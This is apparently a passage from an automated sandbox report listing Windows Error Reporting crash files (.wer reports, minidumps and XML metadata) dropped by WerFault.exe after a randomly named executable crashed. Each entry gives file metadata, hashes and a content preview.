                                                                                                                                                                                                            SHA-512:189A2BC8676F5C8D6C0168E91123776966934C5318AAE6FC65A1F10157C1F09A1BC1077540060BB0B27F97CF925FA1C83A43F0E0B6CE2A97DB18A70276B11B2C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.6.7.3.5.8.4.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.8.8.1.3.9.7.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.3.7.3.f.2.2.-.3.1.2.3.-.4.e.2.4.-.b.a.2.a.-.8.b.f.5.6.3.1.b.3.2.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.5.3.7.a.b.b.-.6.3.f.e.-.4.4.f.c.-.9.0.3.1.-.7.4.7.b.d.5.a.a.a.f.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.6.c.-.0.0.0.1.-.0.0.1.4.-.6.9.f.1.-.a.5.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_cbbd1213-58ab-4f6f-bf02-185a4b452422\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0270445958769614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7ZIlTL7F83BU/ct7jPyzuiF0Y4IO8Iq1:1fBU/wjPyzuiF0Y4IO8
                                                                                                                                                                                                            MD5:93F832491D21A2624854429BA337A36E
                                                                                                                                                                                                            SHA1:3782B65D4301531CD56BE787A507272211DDBD67
                                                                                                                                                                                                            SHA-256:4E6829E17979F67428BC91035DA62231DB29916BB58E24BFE728C3C20FCFF471
                                                                                                                                                                                                            SHA-512:9B5A817018ABC33F90F4908152520732EE65082296F2D61C0DF0AEBAE48C7175934230C4CF2626093CC61D11B002B99DC2CE16E0F6D7551F6E6D06011E9538F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.1.8.7.1.4.7.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.4.2.7.7.7.3.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.b.d.1.2.1.3.-.5.8.a.b.-.4.f.6.f.-.b.f.0.2.-.1.8.5.a.4.b.4.5.2.4.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.5.2.5.d.3.c.-.3.6.d.7.-.4.1.a.6.-.b.a.e.5.-.f.f.e.c.6.7.9.4.2.b.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.c.1.8.6.-.b.c.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_ec47a6fe-f0a6-4803-8964-6c4da61cdbb2\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0269623048302876
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lx/lTL7WG83BU/ct7jPKzuiF0Y4IO8Iq1:stBU/wjPKzuiF0Y4IO8
                                                                                                                                                                                                            MD5:D497FF07C7C8E64B6964C1260277AA85
                                                                                                                                                                                                            SHA1:D6F1342311DE60AF7DDE037D5B4FB5B701353560
                                                                                                                                                                                                            SHA-256:1621E2B6520297299889BB5F7CEAFB0107835D23C7F9E4BB0DCA683096073074
                                                                                                                                                                                                            SHA-512:A5A6EEBD6D7B596CC49FFA472A90BCD448838E3A8A0CC5CD1BB8CB3899F1397BA187380C209A035909B18490FBD389DE79C2EA70DC9D02F6DB49DBF84F4F78F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.6.6.5.9.0.8.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.9.1.4.3.4.6.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.4.7.a.6.f.e.-.f.0.a.6.-.4.8.0.3.-.8.9.6.4.-.6.c.4.d.a.6.1.c.d.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.2.6.1.c.5.6.-.4.2.e.7.-.4.3.c.f.-.9.7.1.5.-.a.f.1.c.5.f.b.e.8.a.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.1.4.-.0.0.0.1.-.0.0.1.4.-.6.6.8.0.-.b.8.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_fa444d1a-85a1-41de-a4d2-0421b3cddf43\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0268527310788043
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vryle8L72880BU/ct7jRJkfTzuiF0Z24IO8Iq1:zylTL7283BU/ct7jPCzuiF0Y4IO8Iq1
                                                                                                                                                                                                            MD5:F941228302114462734E30B4989B4F51
                                                                                                                                                                                                            SHA1:98524AB98B5BB25B233A6ABC589AB580F5ACA3C5
                                                                                                                                                                                                            SHA-256:A924D4456A6C0DB48AF1E8D06408DB459FBB33B437DCFCB96C67220347632BAF
                                                                                                                                                                                                            SHA-512:F2364EC8F5353D0B7A9A317E492FDB0F0A5130AE8879A32E2843103727A5F098560DC21ECDD085DF384A54670FE629E134EBEEA9D4FF81F55203CBE1A9EB5125
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.1.6.8.2.7.6.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.4.5.1.0.9.0.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.4.4.4.d.1.a.-.8.5.a.1.-.4.1.d.e.-.a.4.d.2.-.0.4.2.1.b.3.c.d.d.f.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.1.8.4.9.f.9.-.6.1.1.9.-.4.3.c.a.-.b.0.1.7.-.3.1.b.8.4.3.d.9.7.5.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.4.-.0.0.0.1.-.0.0.1.4.-.5.0.2.1.-.c.0.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2970.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:12 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):746862
                                                                                                                                                                                                            Entropy (8bit):1.6062422940744279
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:NEAIqROPB6v6jRCvhhxvEE1YyJl1x39UmEy8cURWEW3R1J74kcoEge4CvwuH/R3C:NEAIjB6ijuqyua4kcXwERG9
                                                                                                                                                                                                            MD5:6B9E1F37BC4C61EF5ACBD38B1D798E33
                                                                                                                                                                                                            SHA1:E37486BF05913D9C87B102008E7EF6B19B816263
                                                                                                                                                                                                            SHA-256:BD98AA8B5E1EA738227BF2A060E60E43662796EB147F24063DD6D94E5E6D3982
                                                                                                                                                                                                            SHA-512:F8A6D34E77A0C1A3D40E9AF14A42E6A0E0268DADEE9B7EF95DE40983AAD6119E598859BDAF74FF8021DD6CB57CB50F84962B53661CB3049ED632346F4C287D53
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........92g............T...............\.......T... -..........T.......8...........T...........p^..............(............0..............................................................................eJ.......0......GenuineIntel............T............92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A5A.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:12 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):669838
                                                                                                                                                                                                            Entropy (8bit):1.520122477351673
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:M/kUmCi2z7XIwvStGNRaxSFWHYqNXttjPp4kkjJE7mLJ:Ek1uvStGN08FW/dtbpHkFCmL
                                                                                                                                                                                                            MD5:8759406F4752392E2E93E7ABA46A70E4
                                                                                                                                                                                                            SHA1:68604F26A30FCF8852DF6F18E56CD2E09EF6F6CD
                                                                                                                                                                                                            SHA-256:DBF5D971927F1533D8623C8DDD12BEE88597B4FD15611B52EBB38B7F42F3F908
                                                                                                                                                                                                            SHA-512:CA5341D9C8AB5CE372840019720D5349017BB1C2F456844C308AF4AC9F2E484266B0F074FAABED809ECCE5CCD9FB3C5207AE7BB0F6F8F0EF3E3004412D231F38
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........92g............4...............<.......t...8...........T.......8...........T............v...............-..........................................................................................eJ......./......GenuineIntel............T.......,....92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER30D4.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.713227808977653
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJeoWe764q6YcD5SUfU7gmfCeryprJ89bqpsf7Om:R6lXJZ/7636YuSUfU7gmfCerxqCfr
                                                                                                                                                                                                            MD5:ADA19176B541FDF207106DEA572B61CC
                                                                                                                                                                                                            SHA1:59FF7B590F4B208FE8400CBBC1BCB47D04617ACA
                                                                                                                                                                                                            SHA-256:550448F8765D13FFAB273A3976E04C834AE29A4253DCF4BCFF385C1E16F108DE
                                                                                                                                                                                                            SHA-512:A3A66736FEA183321468DC62CC1468A86379CD1F2D862A2FF6A2C2CF1C8E3805A27A28E7DF0331AAEB710F8757A8A2CEE67F27317E4419BD385DC37B420DFC3C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3152.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.568902635204057
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsXJg77aI944c/WpW8VYDYm8M4JuXLBFUTj+q8K/7X41Dxd:uIjf5I7y4cu7VrJgUZXqDxd
                                                                                                                                                                                                            MD5:9065E9F9A0D4B9C17AB2736CD9615C72
                                                                                                                                                                                                            SHA1:AAAF4AF7E5675CFD3B4E1485BF2244732747A2EF
                                                                                                                                                                                                            SHA-256:86235B0E4682501C612F7343979BCB33BEDD295338E6734C81AAD269AEF508E8
                                                                                                                                                                                                            SHA-512:224BD419F657BDC382398271AD23E051C2EA5037931951C217A55FA2D93BBFA8A4A96C13FC58C37037098AA17063F2170E9C343ECD207FDC235E479D52688167
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER31DD.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.711264657419031
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJxWH6ire6YcD4SU9USgmfCeryprD89bqKsfovOm:R6lXJxu6P6Y/SU9USgmfCerDqpfw
                                                                                                                                                                                                            MD5:E57F57DE80B3BCA40631C38B5536E64E
                                                                                                                                                                                                            SHA1:F79DCF8816341163A54248F400D0C53E53E7907B
                                                                                                                                                                                                            SHA-256:F6549A12408DBE994990EA5CAF5D5AF41171BEE8CD1ED05409929EFEA5278E7F
                                                                                                                                                                                                            SHA-512:04EDEF52691DFC43F8B850D02B9F2E7B0255A8ABE7A69F26905C0E3913E29008E9B8D479DC88978521C5907E58256DE557398A6E3BC3590566D64096EC52BEAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.4.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER320B.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:14 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):96724
                                                                                                                                                                                                            Entropy (8bit):1.7246562533817698
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rTSAbuDcziAHzGi+tNNnmRrPHkaxwTYUyIPb:tbrziAHzGJzmRrIYUhP
                                                                                                                                                                                                            MD5:A497B6763AC515FAE307E0974CEE55BA
                                                                                                                                                                                                            SHA1:36A548C9AA5414D303D51F8F5CF542C8B2CE9B26
                                                                                                                                                                                                            SHA-256:7489C6D114BCFB1D4157F75EA86565A94009E6E5D496D686972D907272EFE5D6
                                                                                                                                                                                                            SHA-512:A8232F54865E8E41639EADDC336CAAF7EC1CEE277148CF951B5CD6C491609BEE0548253F7ADB607D342492E6B7682B1500881D2A06E9AFDF3FCE1CC421C0E8F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........92g....................................d...pB..........T.......8...........T............&...S......................................................................................................eJ......p.......GenuineIntel............T............92g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER327A.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.57038653632582
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsXJg77aI944c/WpW8VYZYm8M4JuXLBFyf+q8K/7lceL41D2d:uIjf5I7y4cu7VNJgOfZlqD2d
                                                                                                                                                                                                            MD5:EE1CE1571E5A426ED42BF66E29331A63
                                                                                                                                                                                                            SHA1:1FCAA3F6230CEE618BC79055F9DA3DC7B04CCA84
                                                                                                                                                                                                            SHA-256:24175B2AAEA9F02029D5C5881C6631E5BC71178CE770082DC1312E5363F7D31D
                                                                                                                                                                                                            SHA-512:8815DEB91E69263CA92CC9A1A73150A032D4E3F67429FA8DA5BB43C873CB032DD82F15B91D417BAB42DC239FAA7011B157AEDC4099DFFE2944FC8C87BBDE1C48
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER32F6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8430
                                                                                                                                                                                                            Entropy (8bit):3.7111576400051547
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJPoWV67gb6YcD7SU9USgmfCeryprq89blhsf24v3m:R6lXJwc67s6Y8SU9USgmfCer8laf2t
                                                                                                                                                                                                            MD5:96E1BDD6645C95F9B5D98D5A104581F1
                                                                                                                                                                                                            SHA1:661ABD1980D0F40D6166436E4C4C380E5C757588
                                                                                                                                                                                                            SHA-256:36041CA1FA6E28B9C8FBA32FF15035025BDE16CE9F4D940077C05B2019AEA84F
                                                                                                                                                                                                            SHA-512:E42D029AE9A899A5DEE8FCE11ED91B8FA713BF4879A75141237E5031720C4E33447857945EE0FCEC63B21EF57A8954A1E28DFB7D480CEB08CE856736BFCFD826
                                                                                                                                                                                                            Malicious:false
